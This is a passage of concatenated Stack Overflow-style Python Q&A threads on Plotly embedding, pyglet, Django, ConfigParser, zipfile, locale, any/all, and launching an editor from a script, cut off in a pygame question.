name1 = request.forms.get('name1')
age1 = request.forms.get('age1')
name2 = request.forms.get('name2')
age2 = request.forms.get('age2')
name3 = request.forms.get('name3')
age3 = request.forms.get('age3')
x0 = [name1, name2, name3];
y0 = [age1, age2, age3];
data = {'x': x0, 'y': y0, 'type': 'bar'}
response = py.plot([data])
url = response['url']
filename = response['filename']
return ('''Congrats! View your chart here <a href="https://plot.ly/~abhishek.mitra.963/1">View Graph</a>!''')
if __name__ == '__main__':
port = int(os.environ.get('PORT', 8080))
run(host='0.0.0.0', port=port, debug=True)
Answer: Yes, embedding is possible. Here's an iframe snippet you can use (with any
Plotly URL):
`<iframe width="800" height="600" frameborder="0" seamless="seamless"
scrolling="no"
src="https://plot.ly/~abhishek.mitra.963/1/.embed?width=800&height=600"></iframe>`
The plot gets embedded at a URL that is made especially for embedding the
plot. So in this case your plot is <https://plot.ly/~abhishek.mitra.963/1/>.
The URL to embed it is made by adding .embed to the URL:
<https://plot.ly/~abhishek.mitra.963/1.embed>.
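So a minimal sketch of the question's `submit()` handler that embeds the plot instead of
linking to it (using the `url` already extracted from the `py.plot()` response) might end with:

        response = py.plot([data])
        url = response['url']
        iframe = ('<iframe width="800" height="600" frameborder="0" '
                  'seamless="seamless" scrolling="no" '
                  'src="%s.embed?width=800&height=600"></iframe>' % url)
        return '<h2>Graph via Plot.ly</h2>' + iframe
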
You can change the width/height dimensions in that snippet. To get the iframe
code and see different sizes, you can click the embed icon on a plot, or when
you share it generate the code. Here's where the embed options are:

[Here's how an embedded graph looks in the Washington
Post](http://www.washingtonpost.com/blogs/wonkblog/wp/2013/06/14/do-low-taxes-
on-the-rich-leave-the-middle-class-with-lower-wages/). And
[here](https://realpython.com/blog/python/developing-with-bottle-part-2-plot-
ly-api/) is a helpful tutorial someone made on developing with Plotly and
Bottle.
Let me know if that doesn't work, and I'm happy to help out.
Disclosure: I'm on the Plotly team.
|
OpenGL Pyglet "Error: global name 'texture' not defined"
Question: The error is on line 5: glBindTexture(texture.target, texture.id)
1. import pyglet
2. from pyglet.gl import *
3. class CustomGroup(pyglet.graphics.Group):
4. def set_state(self):
5. glEnable(texture.target)
6. glBindTexture(texture.target, texture.id)
7. def unset_state(self):
8. glDisable(texture.target)
NameError: global name 'texture' is not defined, but I imported it on line 2. The
full code is [here](http://pastebin.com/10JbiCYp "code").
Any help? I am using Python 2.7.3 with pyglet on Ubuntu 12.04.
Answer: The `pyglet.gl` module does not define any variable `texture`, so your import
statement in line 2 does not provide anything like that. And what do you even
expect it to contain? You'll need to create your
[`Texture`](http://www.pyglet.org/doc/api/pyglet.image.Texture-class.html)
object yourself.
To do so, you could use the methods
[`pyglet.resource.image`](http://www.pyglet.org/doc/api/pyglet.resource-
module.html#image) or
[`pyglet.resource.texture`](http://www.pyglet.org/doc/api/pyglet.resource-
module.html#texture) or you could load an `AbstractImage` by calling
[`pyglet.image.load`](http://www.pyglet.org/doc/api/pyglet.image-
module.html#load) and retrieve a corresponding `Texture` object by accessing
the image's `texture` member or, say, adding it to a
[`TextureAtlas`](http://www.pyglet.org/doc/programming_guide/image_sequences_and_atlases.html#texture-
bins-and-atlases).
Why don't you add to your code:
img = pyglet.image.load('imagefile.png')
texture = img.texture
and don't forget to alter your `vertex_list`
[accordingly](http://www.pyglet.org/doc/programming_guide/vertex_attributes.html)
to make use of the texture.
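Putting that together with your group class, a rough sketch (the file name is just a
placeholder) would be:

    img = pyglet.image.load('imagefile.png')
    texture = img.get_texture()   # the Texture object your group needs

    class CustomGroup(pyglet.graphics.Group):
        def set_state(self):
            glEnable(texture.target)
            glBindTexture(texture.target, texture.id)

        def unset_state(self):
            glDisable(texture.target)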
|
django-cms refusing to publish a specific page in production - where should I start debugging?
Question: I have a small problem in my production cms. One of the pages (There are about
50) is refusing to be published. I mean: if I click on "publish" in the admin
interface or use the method publish_page I am not getting any errors. On the
page list view there's a green check by this page. But when I browse in there,
I am getting a nice 404 error. And if I refresh the page list view, the green
check turns into a red sign (not published).
I don't know where should I start debugging this issue.
>>> from cms.api import publish_page
>>> p = Page.objects.get(pk__exact=66)
>>> r = User.objects.get(pk=2)
>>> p2 = publish_page(p, r)
>>> p2
<cms.models.pagemodel.Page object at 0x3561910>
>>> p2.is_public_published()
True
There are no error traces in my /var/log/httpd/access_log nor
/var/log/httpd/error_log (apart of the 404 warning). These are my logging
settings:
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
},
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose'
},
},
'loggers': {
'django': {
'handlers': ['console'],
'level': 'DEBUG',
'propagate': True,
},
'django.request': {
'handlers': ['mail_admins'],
'level': 'DEBUG',
'propagate': True,
},
'department.models': {
'handlers': ['console'],
'level': 'DEBUG'
},
}
}
Could you please suggest where I should start debugging? Thanks!
Roberto
UPDATE:
My virtual environment has the following installed:
Django - 1.5.4 - active
PIL - 1.1.7 - active
Pillow - 2.2.1 - active
Pygments - 1.6 - active
Python - 2.7.3 - active development (/usr/lib/python2.7/lib-dynload)
South - 0.8.2 - active
argparse - 1.2.1 - active development (/usr/lib/python2.7)
bpython - 0.12 - active
cmsplugin-news - 0.4.2 - active
django-autoslug - 1.7.1 - active
django-ckeditor - 4.0.2 - active
django-classy-tags - 0.4 - active
django-cms - 2.4.2 - active
django-country-dialcode - 0.4.8 - active
django-extensions - 1.2.2 - active
django-guardian - 1.1.1 - active
django-hvad - 0.3 - active
django-modeltranslation - 0.6.1 - active
django-mptt - 0.5.2 - active
django-reusableapps - 0.1.1 - active
django-reversion - 1.7.1 - active
django-sekizai - 0.7 - active
djangocms-text-ckeditor - 1.0.10 - active
html5lib - 1.0b3 - active
pip - 1.2.1 - active
psycopg2 - 2.5.1 - active
python-ldap - 2.4.13 - active
python-magic - 0.4.6 - active
pytz - 2013.7 - active
setuptools - 1.1.6 - active
six - 1.4.1 - active
switch2bill-common - 2.8.1 - active
wsgiref - 0.1.2 - active development (/usr/lib/python2.7)
Answer: The list-view of pages in Django-CMS is largely powered by ajax requests.
I would take a look at that view using Firebug to see if any of the publishing
functions are returning 500 errors from ajax requests that won't cause the
view itself to throw a 500.
I've had plugins get corrupted which in turn caused publishing to fail. In the
list-view of pages, the pages appear to publish correctly, as checkboxes get
checked, etc, but in Firebug those ajax POST requests were returning 500
errors.
|
Reverse for '' with arguments '(1L,)' and keyword arguments '{}' not found
Question: I'm new to Django and am facing the following problem: when I follow the appropriate
link I get the following error:
`NoReverseMatch at /tutorial/`
`Reverse for 'tutorial.views.section_tutorial' with arguments '(1L,)' and
keyword arguments '{}' not found.`
What am I doing wrong? And why is "1L" passed in the args instead of "1"?
(When I pass "1" I get the same error.) I tried to change
`'tutorial.views.section_tutorial'` to `'section-detail'` in my template but
still nothing has changed. I am using Django 1.5.4 and Python 2.7. Thanks!
`tutorial/view.py`:
def get_xhtml(s_url):
...
return result
def section_tutorial(request, section_id):
sections = Section.objects.all()
subsections = Subsection.objects.all()
s_url = Section.objects.get(id=section_id).content
result = get_xhtml(s_url)
return render(request, 'tutorial/section.html', {'sections': sections,
'subsections': subsections,
'result': result})
`tutorial/urls.py`:
from django.conf.urls import patterns, url
import views
urlpatterns = patterns('',
url(r'^$', views.main_tutorial, name='tutorial'),
url(r'^(?P<section_id>\d+)/$', views.section_tutorial, name='section-detail'),
url(r'^(?P<section_id>\d+)/(?P<subsection_id>\d+)/$', views.subsection_tutorial, name='subsection-detail'),
)
`urls.py`:
urlpatterns = patterns('',
url(r'^$', views.index, name='index'),
url(r'^tutorial/$', include('apps.tutorial.urls')),
)
`main.html`:
{% extends "index.html" %}
{% block content %}
<div class="span2" data-spy="affix">
<ul id="menu">
{% for section in sections %}
<li>
<a href="{% url 'tutorial.views.section_tutorial' section.id %}">{{ section.name }}</a>
<ul>
{% for subsection in subsections%}
{% if subsection.section == section.id %}
<li><a href=#>{{ subsection.name }}</a></li>
{% endif %}
{% endfor %}
</ul>
{% endfor %}
</li>
</ul>
</div>
<div class="span9">
<div class="well">
{% autoescape off%}
{{ result }}
{% endautoescape %}
</div>
</div>
{% endblock %}
Answer: You don't need the `$` end-of-string anchor in the url regex in your main urls file when
including app urls:
url(r'^tutorial/$', include('apps.tutorial.urls')),
should be:
url(r'^tutorial/', include('apps.tutorial.urls')),
|
Django "__init__() keywords must be strings" error while running "runserver"
Question: I just set up a virtualenv to start a Django project. I installed everything fine.
When I issue "python manage.py runserver" it spits out this error. I looked through all
kinds of Django runserver errors and no one seems to have this one.
Does anyone have insight into it?
Validating models...
Unhandled exception in thread started by <bound method Command.inner_run of <django.contrib.staticfiles.management.commands.runserver.Command object at 0x1016bb0d0>>
Traceback (most recent call last):
File "/usr/local/bin/django-hari/lib/python2.6/site-packages/Django-1.5.4-py2.6.egg/django/core/management/commands/runserver.py", line 92, in inner_run
self.validate(display_num_errors=True)
File "/usr/local/bin/django-hari/lib/python2.6/site-packages/Django-1.5.4-py2.6.egg/django/core/management/base.py", line 280, in validate
num_errors = get_validation_errors(s, app)
File "/usr/local/bin/django-hari/lib/python2.6/site-packages/Django-1.5.4-py2.6.egg/django/core/management/validation.py", line 35, in get_validation_errors
for (app_name, error) in get_app_errors().items():
File "/usr/local/bin/django-hari/lib/python2.6/site-packages/Django-1.5.4-py2.6.egg/django/db/models/loading.py", line 166, in get_app_errors
self._populate()
File "/usr/local/bin/django-hari/lib/python2.6/site-packages/Django-1.5.4-py2.6.egg/django/db/models/loading.py", line 72, in _populate
self.load_app(app_name, True)
File "/usr/local/bin/django-hari/lib/python2.6/site-packages/Django-1.5.4-py2.6.egg/django/db/models/loading.py", line 96, in load_app
models = import_module('.models', app_name)
File "/usr/local/bin/django-hari/lib/python2.6/site-packages/Django-1.5.4-py2.6.egg/django/utils/importlib.py", line 35, in import_module
__import__(name)
File "/usr/local/bin/django-hari/lib/python2.6/site-packages/Django-1.5.4-py2.6.egg/django/contrib/auth/models.py", line 21, in <module>
from django.contrib.contenttypes.models import ContentType
File "/usr/local/bin/django-hari/lib/python2.6/site-packages/Django-1.5.4-py2.6.egg/django/contrib/contenttypes/models.py", line 127, in <module>
class ContentType(models.Model):
File "/usr/local/bin/django-hari/lib/python2.6/site-packages/Django-1.5.4-py2.6.egg/django/db/models/base.py", line 97, in __new__
new_class.add_to_class('_meta', Options(meta, **kwargs))
TypeError: Error when calling the metaclass bases
__init__() keywords must be strings
Answer: It's [a known issue](https://code.djangoproject.com/ticket/18961). Django 1.5
[requires](https://docs.djangoproject.com/en/1.5/topics/install/#install-
python) Python 2.6.5 or newer. You have an older version of Python installed
on your computer. You need to [install a newer version of
Python](http://www.python.org/getit/), for example Python 2.7.x.
|
Pythonic way of writing a library function which accepts multiple types?
Question: If, as a simplified example, I am writing a library to help people model
populations I might have a class such as:
class Population:
def __init__(self, t0, initial, growth):
            self.t0 = t0
self.initial = initial
self.growth = growth
where t0 is of type datetime. Now I want to provide a method to determine the
population at a given time, whether that be a datetime or a float containing
the number of seconds since t0. Further, it would be reasonable for the caller
to provide an array of such times (if so, I think it reasonable to assume they
will all be of the same type). There are at least two ways I can see to
accomplish this:
1. Method for each type
def at_raw(self, t):
if not isinstance(t, collections.Iterable):
t = numpy.array([t])
return self.initial*numpy.exp(self.growth*t)
def at_datetime(self, t):
if not isinstance(t, collections.Iterable):
t = [t]
dt = numpy.array([(t1-self.t0).total_seconds() for t1 in t])
return self.at_raw(dt)
2. Universal method
def at(self, t):
if isinstance(t, datetime):
t = (t-self.t0).total_seconds()
if isinstance(t, collections.Iterable):
if isinstance(t[0], datetime):
t = [(t1-self.t0).total_seconds() for t1 in t]
else:
t = np.array([t])
return self.initial*numpy.exp(self.growth*t)
Either would work, but I'm not sure which is more pythonic. I've seen some
suggestions that type checking indicates bad design which would suggest method
1 but as this is a library intended for others to use, method 2 would probably
be more useful.
Note that it is necessary to support times given as floats, even if only the
library itself uses this feature, for example I might implement a method which
root finds for stationary points in a more complicated model where the float
representation is clearly preferable. Thanks in advance for any suggestions or
advice.
Answer: I believe you can simply stick with Python's duck-typing philosophy here

    def at(self, t):
        def get_arr(t):
            try:  # try to iterate over it
                return [get_arr(t1)[0] for t1 in t]
            except TypeError:
                # oops, not iterable
                pass
            try:  # datetime objects support subtraction
                return [(t - self.t0).total_seconds()]
            except TypeError:
                # oops, not a datetime object
                pass
            # it is just a plain number
            return [t]
        return self.initial * numpy.exp(self.growth * numpy.array(get_arr(t)))
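With that in place, callers can pass whatever representation they have (a quick sketch using
the `Population` class from the question):

    from datetime import datetime

    p = Population(datetime(2013, 1, 1), initial=100.0, growth=1e-6)

    p.at(3600.0)                           # seconds since t0
    p.at(datetime(2013, 1, 1, 1, 0))       # a single datetime
    p.at([3600.0, 7200.0, 10800.0])        # an iterable of either kind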
It's important how you order the cases:
1. Specific Cases should precede generic cases.
def foo(num):
"""Convert a string implementation to
Python Object"""
try: #First check if its an Integer
return int(num)
except ValueError:
#Well not an Integer
pass
try: #Check if its a float
return float(num)
except ValueError:
pass
#Invalid Number
raise TypeError("Invalid Number Specified")
2. Default Case should be the terminating case
3. If successive cases are mutually exclusive, order them by likeliness.
4. Prepare for the Unexpected by raising Exception. After all `Errors should never pass silently.`
|
Homework: need to check the time performance of the loop, computer heats
Question: I typed this code in Python and my computer really heats up and doesn't print
anything! However, when I assigned `num = 2**10` it did. How can I calculate
approximately how long it will take an average computer to run this code? The
code is:
num = 2**100
cnt = 0
import time
t0 = time.clock()
for i in range(num):
cnt = cnt+1
print(cnt)
t1 = time.clock()
print("running time: ", t1-t0, " sec")
Answer: That's because your computer doesn't ever finish the computation with `num = 2**100`. That is roughly 1.3 × 10^30 loop iterations; even at an optimistic billion iterations per second (ignoring the `print` on every pass, which is far slower), the loop would take on the order of 10^13 years, so the lines after it are never reached.
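If you want a rough estimate for your own machine, one approach (a sketch, assuming Python 3
since the question uses `print()` as a function) is to time a much smaller loop of the same
kind and extrapolate; remember the real loop also prints on every iteration, which makes it
slower still:

    import time

    num = 2**100
    sample = 10**7                 # small enough to finish in a few seconds

    t0 = time.clock()
    cnt = 0
    for i in range(sample):
        cnt = cnt + 1
    t1 = time.clock()

    seconds_per_iteration = (t1 - t0) / sample
    estimate = seconds_per_iteration * num
    print("roughly %.3g years" % (estimate / (3600 * 24 * 365)))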
|
Cython: overloaded constructor initialization using raw pointer
Question: I'm trying to wrap two C++ classes: Cluster and ClusterTree. ClusterTree has a
method get_current_cluster() that instantiates a Cluster object, and returns a
reference to it. ClusterTree owns the Cluster object, and manages its creation
and deletion in C++.
I've wrapped Cluster with cython, resulting in PyCluster.
PyCluster should have two ways of creation:
1) By passing in two arrays, which then implies that Python should then
automatically handle deletion (via __dealloc__)
2) By directly passing in a raw C++ pointer (created by ClusterTree's
get_current_cluster()). In this case, ClusterTree then assumes responsibility
of deleting the underlying pointer.
from libcpp cimport bool
from libcpp.vector cimport vector
cdef extern from "../include/Cluster.h" namespace "Terran":
cdef cppclass Cluster:
Cluster(vector[vector[double]],vector[int]) except +
cdef class PyCluster:
cdef Cluster* __thisptr
__autoDelete = True
def __cinit__(self, vector[vector[double]] data, vector[int] period):
self.__thisptr = new Cluster(data, period)
@classmethod
def __constructFromRawPointer(self, raw_ptr):
self.__thisptr = raw_ptr
self.__autoDelete = False
def __dealloc__(self):
if self.__autoDelete:
del self.__thisptr
cdef extern from "../include/ClusterTree.h" namespace "Terran":
cdef cppclass ClusterTree:
ClusterTree(vector[vector[double]],vector[int]) except +
Cluster& getCurrentCluster()
cdef class PyClusterTree:
cdef ClusterTree *__thisptr
def __cinit__(self, vector[vector[double]] data, vector[int] period):
self.__thisptr = new ClusterTree(data,period)
def __dealloc__(self):
del self.__thisptr
def get_current_cluster(self):
cdef Cluster* ptr = &(self.__thisptr.getCurrentCluster())
return PyCluster.__constructFromRawPointer(ptr)
This results in:
Error compiling Cython file:
------------------------------------------------------------
...
def get_current_cluster(self):
cdef Cluster* ptr = &(self.__thisptr.getCurrentCluster())
return PyCluster.__constructFromRawPointer(ptr)
^
------------------------------------------------------------
terran.pyx:111:54: Cannot convert 'Cluster *' to Python object
Note I cannot cdef __init__ or @classmethods.
Answer: I know this is an old question, but after my own recent struggles with Cython
I thought I'd post an answer for the sake of posterity.
It seems to me you could use a copy constructor to create a new PyCluster
object from an existing Cluster object.
Define the copy constructor in your C code, then call the copy constructor in
the Python class definition (in this case, when a pointer is passed) using
`new`. This will work, although it may not be the best or most performant
solution.
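A minimal Cython sketch of that idea (the attribute is renamed to `_thisptr` to sidestep name
mangling, and the accessible copy constructor and the factory names are assumptions, not part of
the questioner's real API):

    from cython.operator cimport dereference as deref
    from libcpp.vector cimport vector

    cdef class PyCluster:
        cdef Cluster* _thisptr

        def __cinit__(self):
            self._thisptr = NULL            # real construction happens below

        def __dealloc__(self):
            if self._thisptr != NULL:
                del self._thisptr

        @staticmethod
        def from_data(vector[vector[double]] data, vector[int] period):
            cdef PyCluster py = PyCluster()
            py._thisptr = new Cluster(data, period)
            return py

    cdef PyCluster wrap_copy(Cluster* raw_ptr):
        # requires Cluster(const Cluster&) to be declared in the extern block;
        # the Python wrapper then owns its own copy outright
        cdef PyCluster py = PyCluster()
        py._thisptr = new Cluster(deref(raw_ptr))
        return py

`get_current_cluster()` can then simply `return wrap_copy(&(self.__thisptr.getCurrentCluster()))`,
since the tree-owned object is no longer shared with Python.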
|
python: Open file from zip without temporary extracting it
Question: How can I open files from a zip archive without extracting them first?
I'm using pygame. To save disk space, I have all the images zipped up. Is it
possible to load a given image directly from the zip file? For example:
`pygame.image.load('zipFile/img_01')`
Answer: Vincent Povirk's answer won't work completely;
import zipfile
archive = zipfile.ZipFile('images.zip', 'r')
imgfile = archive.open('img_01.png')
...
You have to change it to:
import zipfile
archive = zipfile.ZipFile('images.zip', 'r')
imgdata = archive.read('img_01.png')
...
For details read the notes under 'ZipFile.open(name[, mode[, pwd]])' in the
documentation on: <http://docs.python.org/2/library/zipfile>
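Since the question is about pygame specifically: `pygame.image.load` also accepts a file-like
object (plus a name hint so it can pick the right decoder), so a sketch of loading straight
from the archive would be:

    import io
    import zipfile
    import pygame

    archive = zipfile.ZipFile('images.zip', 'r')
    imgdata = archive.read('img_01.png')
    img = pygame.image.load(io.BytesIO(imgdata), 'img_01.png')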
|
How to replace characters that have already been printed in a previous line
Question: I am trying to make a game similar to [this](http://candies.aniwey.net/) in
Python (3.3.2 on Windows). I think that most of the programming is fairly
basic and so it will be easy for me as beginner. What I can't understand is
how to have a line of code that is constantly being changed while remaining in
the same location (I am trying to describe the amount of candies that you
have[if you look the line stays in the same place yet the physical str
changes]). I understand that you will have to do something like:
candiesNbrDisplay = 'You have ' + str(candiesNbrOwned) + ' candies!'
candiesNbrOwned = candiesNbrOwned + 1
time.sleep( 1)
but how do you change the number without ending up with [this](http://imgur.com/mNj0A9S)?
Answer: This works on Unix (Mac OS X 10.8.5, with Python 2.7.2):
import time
import sys
for i in xrange(1, 10):
print "\rThe number of candies is %d and the pile is growing" % i,
sys.stdout.flush()
time.sleep(1)
print ""
I don't know whether it will work on Windows or with Python 3.
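For Python 3 (which the question is using), roughly the same idea can be written with the
`print()` function; this is a sketch, untested on Windows, but `\r` is generally honoured
there too:

    import time

    for i in range(1, 10):
        print("\rThe number of candies is %d and the pile is growing" % i,
              end="", flush=True)
        time.sleep(1)
    print()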
|
Redirect text from editor directly to python script
Question: Is there a way to open a text editor like vim or gedit from a Python script and
then redirect the typed text from the text editor back directly to the Python script so I
could save it in a database? Something like the git commit command, which opens an
external text editor and on exit saves the commit message, but not into a file.
Answer: I think you would end up depending too much on $EDITOR specific behaviour
without a tempfile. The tempfile module deals with the choice of a tempdir and
tempfilename so you will not have to. Try the following.
manedit.py:
import os
import tempfile
import subprocess
data = '6 30 210 2310 30030'
mefile = tempfile.NamedTemporaryFile( delete=False )
# delete=False otherwise delete on close()
mefile.write( data )
mefile.close()
subprocess.call( [ os.environ.get('EDITOR','') or 'vim', mefile.name ] )
# unset EDITOR or EDITOR='' -> default = vim
# block here
mefile = open( mefile.name, 'r' )
newdata = mefile.read()
mefile.close()
os.remove( mefile.name )
print( newdata )
And then try the following commands to verify each scenario. Replace ed with
an editor that differs from your $EDITOR
python manedit.py
env EDITOR= python manedit.py
env EDITOR=ed python manedit.py
env -u EDITOR python manedit.py
The pitfall: the script blocks only while EDITOR is running. An editor may
just open a new window on an existing editor session and return, suggesting
that the manual edit session completed. However, I don't know of such an editor.
edit: If you are interested specifically in vim or you want to see how
specific such thing can get, see the following:
<http://vimdoc.sourceforge.net/htmldoc/remote.html>
<http://petro.tanrei.ca/2010/8/working-with-vim-and-ipython.html>
<http://www.freehackers.org/VimIntegration>
|
How to read a config file using python
Question: I have a config file `abc.txt` which looks somewhat like:
path1 = "D:\test1\first"
path2 = "D:\test2\second"
path3 = "D:\test2\third"
I want to read these paths from the `abc.txt` to use it in my program to avoid
hard coding.
Answer: In order to use my example, your file "abc.txt" needs to look like:
[your-config]
path1 = "D:\test1\first"
path2 = "D:\test2\second"
path3 = "D:\test2\third"
Then in your software you can use the config parser:
import ConfigParser
and then in your code:
configParser = ConfigParser.RawConfigParser()
configFilePath = r'c:\abc.txt'
configParser.read(configFilePath)
Use case:
self.path = configParser.get('your-config', 'path1')
|
Python: get OS language
Question: What is a way to get the current Windows (or OS X) locale id in Python 2.x? I want
to get an int (or str) which tells what language is active in the OS.
Is it possible without using WinAPI?
Answer: This is the documentation related to the
**[locale](http://www.python.org/doc//current/library/locale.html)** module in
Python 2.6.
To be more specific, here is an example (from the above link) of how to get
your system's locale:
import locale
loc = locale.getlocale() # get current locale
locale.getdefaultlocale() # Tries to determine the default locale settings and returns them as a tuple of the form (language code, encoding); e.g, ('en_US', 'UTF-8').
|
SyntaxError: Invalid Syntax PLEASE help me
Question: Hey guys, I am trying to learn Python through an online book here:
<http://learnpythonthehardway.org/book/ex1.html>
However, I am trying to run a program to make it say stuff (I am trying to use
Windows PowerShell like it suggested) and I keep getting an error:
Program:
print "hello world!"
Error:
File "<stdin>", line 1
python exp1.py
^
SyntaxError: Invalid Syntax
I am using ActivePython 2.7.5.6
Answer: Try
import exp1
instead, since you already are inside an interpreter, as @hcwhsa said.
But that's really just an easy-to-give workaround. You should exit the
interpreter and execute the command from outside it.
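Roughly, the session would look like this (a sketch; your PowerShell prompt will differ):

    >>> exit()                # leave the Python interpreter first
    PS C:\Users\you> python exp1.py
    hello world!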
|
cannot resolve AttributeError: 'module' object has no attribute 'calcKappa'
Question: I'm completely new to Python. Currently I'm using Enthought Canopy (Python 2.7.3). I
know this question has been asked a million times before and I can imagine you
are all tired of this question, but it has been bugging me all day.
import Basismodel
def doAll(c):
#from Basismodel import calcKappa
Basismodel.setC(c)
Basismodel.setMu()
Basismodel.setLambda()
Basismodel.calcKappa()
Basismodel.calcSumofprob()
Basismodel.calcPi()
doAll(100)
With another file Basismodel.py where all functions mentioned in here are
defined. It doesn't give any error with the first 3 but it does with the last
3.
As extra information I'll give you the code for Basismodel.py as well
global c
global lamb
global pi
global kappa
global mu
global sumofkappa
global f
f=0.6 #the percentage that takes the car
c=100 #max
sumofkappa=0 #sum of all kappa
sumofpi=0 #sum of all probabilities (should be equal to 1)
pi=[]
kappa=[1.0]
mu=[0.4]
lamb=[0.1] #Lambda is de arrival rate
def setC(y):
c=y
#print c
def setMu():
global mu
for i in range (c):
mu.append((i+2)*mu[0])
#print mu[i]
def setLambda():
for i in range (c):
lamb.append(lamb[1])
#print lamb[i]
def calcKappa():
for i in range (c):
if (i==0):
kappa[0]=1.0
else:
kappa[i].append(kappa[i-1]*lamb[i-1]/mu[i])
def calcSumofprob():
for i in range (c):
global sumofkappa
sumofkappa += kappa[i]
def calcPi():
for i in range (c):
pi.append(kappa[i]/sumofkappa)
def calcAveragePi():
for i in range(c):
global sumofpi
sumofpi += pi[i]
return sumofpi/c
When I execute the main it gives this error, which doesn't make any sense since
all print lines are commented out. However, I am more interested in why it
can't find the attribute. Also, when I set "#from .Basismodel import calcKappa"
after def doAll, the error changes to an ImportError where it can't import.
%run "C:/Users/Thomas/Dropbox/Thesis/Canopy files/Main.py"
100
0.4
0.8
1.2
1.6
2.0
2.4
2.8
3.2
3.6
4.0
4.4
4.8
5.2
5.6
6.0
6.4
6.8
7.2
7.6
8.0
8.4
0.8
1.2
1.6
2.0
2.4
2.8
3.2
3.6
4.0
4.4
4.8
5.2
5.6
6.0
6.4
6.8
7.2
7.6
8.0
8.4
0.8
1.2
1.6
2.0
2.4
2.8
3.2
3.6
4.0
4.4
4.8
5.2
5.6
6.0
6.4
6.8
7.2
7.6
8.0
8.4
0.8
1.2
1.6
2.0
2.4
2.8
3.2
3.6
4.0
4.4
4.8
5.2
5.6
6.0
6.4
6.8
7.2
7.6
8.0
8.4
0.8
1.2
1.6
2.0
2.4
2.8
3.2
3.6
4.0
4.4
4.8
5.2
5.6
6.0
6.4
6.8
7.2
7.6
8.0
---------------------------------------------------------------------------
AttributeError Traceback (most recent call last)
C:\Users\Thomas\AppData\Local\Enthought\Canopy\App\appdata\canopy-1.1.0.1371.win-x86_64\lib\site-packages\IPython\utils\py3compat.pyc in execfile(fname, glob, loc)
174 else:
175 filename = fname
--> 176 exec compile(scripttext, filename, 'exec') in glob, loc
177 else:
178 def execfile(fname, *where):
C:\Users\Thomas\Dropbox\Thesis\Canopy files\Main.py in <module>()
17 return Basismodel.calcAveragePi()
18
---> 19 doAll(100)
20
21 #while(condition==0):
C:\Users\Thomas\Dropbox\Thesis\Canopy files\Main.py in doAll(c)
12 Basismodel.setMu()
13 Basismodel.setLambda()
---> 14 Basismodel.calcKappa()
15 Basismodel.calcSumofprob()
16 Basismodel.calcPi()
AttributeError: 'module' object has no attribute 'calcKappa'
Can anybody help?
Answer:
global c
global lamb
global pi
global kappa
global mu
global sumofkappa
global f
Those lines don't do what you think they do. `global` is a keyword that is
placed within a function to reference the global declaration of a variable.
e.g.
x = 42
def without_global():
x = 9
print(x)
def with_global():
global x
x = 13
print(x)
print(x)
without_global()
print(x)
with_global()
print(x)
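Running that example should print something like the following, showing that only the
`global` version changes the module-level `x`:

    42
    9
    42
    13
    13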
I get entirely different issues here, though.
|
How do Python's any and all functions work?
Question: I'm trying to understand how the `any()` and `all()` Python built-in functions
work.
I'm trying to compare the tuples so that if any value is different then it
will return `True` and if they are all the same it will return `False`. How
are they working in this case to return [False, False, False]?
`d` is a `defaultdict(list)`.
print d['Drd2']
# [[1, 5, 0], [1, 6, 0]]
print list(zip(*d['Drd2']))
# [(1, 1), (5, 6), (0, 0)]
print [any(x) and not all(x) for x in zip(*d['Drd2'])]
# [False, False, False]
To my knowledge, this should output
# [False, True, False]
since (1,1) are the same, (5,6) are different, and (0,0) are the same.
**Why is it evaluating to False for all tuples?**
Answer: You can roughly think of `any` and `all` as series of logical `or` and `and`
operators, respectively.
**any**
`any` will return `True` when **at least one of the elements** is Truthy. Read
about [Truth Value
Testing.](http://docs.python.org/2/library/stdtypes.html#truth-value-testing)
**all**
`all` will return `True` only when **all the elements** are Truthy.
**Truth table**
+-----------------------------------------+---------+---------+
| | any | all |
+-----------------------------------------+---------+---------+
| All Truthy values | True | True |
+-----------------------------------------+---------+---------+
| All Falsy values | False | False |
+-----------------------------------------+---------+---------+
| One Truthy value (all others are Falsy) | True | False |
+-----------------------------------------+---------+---------+
| One Falsy value (all others are Truthy) | True | False |
+-----------------------------------------+---------+---------+
| Empty Iterable | False | True |
+-----------------------------------------+---------+---------+
**Note 1:** The empty iterable case is explained in the official
documentation, like this
[**`any`**](https://docs.python.org/2/library/functions.html#any)
> Return `True` if any element of the iterable is true. **If the iterable is
> empty, return`False`**
Since none of the elements is true, it returns `False` in this case.
[**`all`**](https://docs.python.org/2/library/functions.html#all)
> Return `True` if all elements of the iterable are true (**or if the iterable
> is empty**).
Since none of the elements is false, it returns `True` in this case.
* * *
**Note 2:**
Another important thing to know about `any` and `all` is that they short-
circuit the execution the moment they know the result. The advantage is that the
entire iterable need not be consumed. For example,
>>> multiples_of_6 = (not (i % 6) for i in range(1, 10))
>>> any(multiples_of_6)
True
>>> list(multiples_of_6)
[False, False, False]
Here, `(not (i % 6) for i in range(1, 10))` is a generator expression which
returns `True` if the current number within 1 and 9 is a multiple of 6. `any`
iterates the `multiples_of_6` and when it meets `6`, it finds a Truthy value,
so it immediately returns `True`, and rest of the `multiples_of_6` is not
iterated. That is what we see when we print `list(multiples_of_6)`, the result
of `7`, `8` and `9`.
This excellent thing is used very cleverly in [this
answer](http://stackoverflow.com/a/16801605/1903116).
* * *
With this basic understanding, if we look at your code, you do
any(x) and not all(x)
which makes sure that at least one of the values is Truthy but not all of
them. For `(5, 6)`, for example, both `any` and `all` are `True`, so the expression is
`False`; the same holds for the other tuples. That is why it is returning
`[False, False, False]`. If you really wanted to check whether the two numbers differ,
print [x[0] != x[1] for x in zip(*d['Drd2'])]
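For the sample data above, this gives the result the question expected:

    >>> [x[0] != x[1] for x in zip(*d['Drd2'])]
    [False, True, False]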
|
Detecting collision when rotating
Question: I have a chain of squares represented in pygame. I have some code that lets me
rotate parts of the chain, as follows.
#!/usr/bin/python
import pygame
def draw(square):
(x,y) = square
pygame.draw.rect(screen, black, (100+x*20,100+y*20,20,20), 1)
def rotate(chain, index, direction):
(pivotx, pivoty) = chain[index]
if (direction == 1):
